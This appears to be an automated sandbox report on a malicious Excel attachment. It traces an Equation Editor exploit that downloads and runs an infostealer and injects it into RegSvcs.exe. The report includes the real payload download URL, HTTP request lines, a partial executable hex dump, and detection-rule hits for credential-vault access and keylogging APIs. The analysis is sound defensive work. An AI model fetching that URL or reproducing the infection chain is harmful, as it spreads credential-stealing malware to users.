                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:40:28 GMTContent-Type: application/x-msdownloadContent-Length: 1128615Connection: keep-aliveLast-Modified: Tue, 08 Oct 2024 08:42:11 GMTVary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: REVALIDATEDAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPECWJNRPWxSuYTQxpFRCNFGz%2BYtYo1BnLj4wePLlCsnvDdgc5Hgs6Or3nCd%2BDpYKpD1ZZcna6daAnt4HJldLia0vtk5QCqQrvGZcCkdKlWXyIM79kox0B1hRTZulRguAxQLQADMZWzgNIhyZr%2BWSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d04f6633acc42d8-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 cf 93 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 d6 01 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 0b 00 00 04 00 00 35 21 0a 00 02 00 00 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c cd 08 00 54 01 00 00 00 b0 0a 00 98 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 40 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichiPELK#c @P5!@@<T @
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: global trafficHTTP traffic detected: GET /vnkl/ng5th.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eficienciaeningenieria.com.mxConnection: Keep-Alive
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520541 URLDownloadToFileW,2_2_03520541
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exeJump to behavior
                  Source: global trafficHTTP traffic detected: GET /vnkl/ng5th.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: eficienciaeningenieria.com.mxConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: eficienciaeningenieria.com.mx
                  Source: EQNEDT32.EXE, 00000002.00000002.469930663.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/vnkl/ng5th.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/vnkl/ng5th.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.469930663.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eficienciaeningenieria.com.mx/vnkl/ng5th.exejjC:
                  Source: zwuonypqu.exe, 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, J4qms1IPBw.cs.Net Code: XxsovuwC
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046C5D0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00459FFF
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046C5D0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,5_2_00456354
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C08E

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 5.2.zwuonypqu.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00434D50
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_004461ED
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004364AA
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00409A405_2_00409A40
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004120385_2_00412038
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0047E1FA5_2_0047E1FA
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0041A46B5_2_0041A46B
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0041240C5_2_0041240C
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004465665_2_00446566
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004045E05_2_004045E0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004128185_2_00412818
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0047CBF05_2_0047CBF0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00412C385_2_00412C38
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00424F705_2_00424F70
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0041AF0D5_2_0041AF0D
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004271615_2_00427161
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004212BE5_2_004212BE
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004433905_2_00443390
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004433915_2_00443391
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0041D7505_2_0041D750
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004037E05_2_004037E0
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004278595_2_00427859
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040F8905_2_0040F890
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0042397B5_2_0042397B
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00411B635_2_00411B63
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00423EBF5_2_00423EBF
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_035344A05_2_035344A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001DB0606_2_001DB060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001D39106_2_001D3910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001DE4606_2_001DE460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001D45286_2_001D4528
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001D7DE06_2_001D7DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001D3C586_2_001D3C58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003E10B86_2_003E10B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003E49AF6_2_003E49AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003E7B206_2_003E7B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_003E09D06_2_003E09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001DB4086_2_001DB408
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001D7E986_2_001D7E98
                  Source: Inquiry N TM24-10-09.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: String function: 00445975 appears 65 times
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: String function: 0041171A appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: String function: 0041718C appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: String function: 0040E6D0 appears 35 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 5.2.zwuonypqu.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, Lds5plxAPDj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, LZYJybC.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, wDxPSW1p.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, E0w8WLnyggK.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, ZBSJHga2buE.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, M4oIYVa.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, kSS2HMsB8.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpack, kSS2HMsB8.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0044AF5C GetLastError,FormatMessageW,5_2_0044AF5C
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,5_2_00464422
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004364AA
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,5_2_0045D517
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,5_2_0043701F
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,5_2_0047A999
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,5_2_0043614F
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Inquiry N TM24-10-09.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8B3E.tmpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Inquiry N TM24-10-09.xlam.xlsxReversingLabs: Detection: 71%
                  Source: Inquiry N TM24-10-09.xlam.xlsxVirustotal: Detection: 51%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: zwuonypqu.exe, 00000005.00000003.477048831.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, zwuonypqu.exe, 00000005.00000003.477112588.0000000003D00000.00000004.00001000.00020000.00000000.sdmp
                  Source: Inquiry N TM24-10-09.xlam.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0040EB70 LoadLibraryA,GetProcAddress,5_2_0040EB70
                  Source: zwuonypqu.exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x11db3a
                  Source: ng5th[1].exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x11db3a
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004171D1 push ecx; ret 5_2_004171E4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_004772DE
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
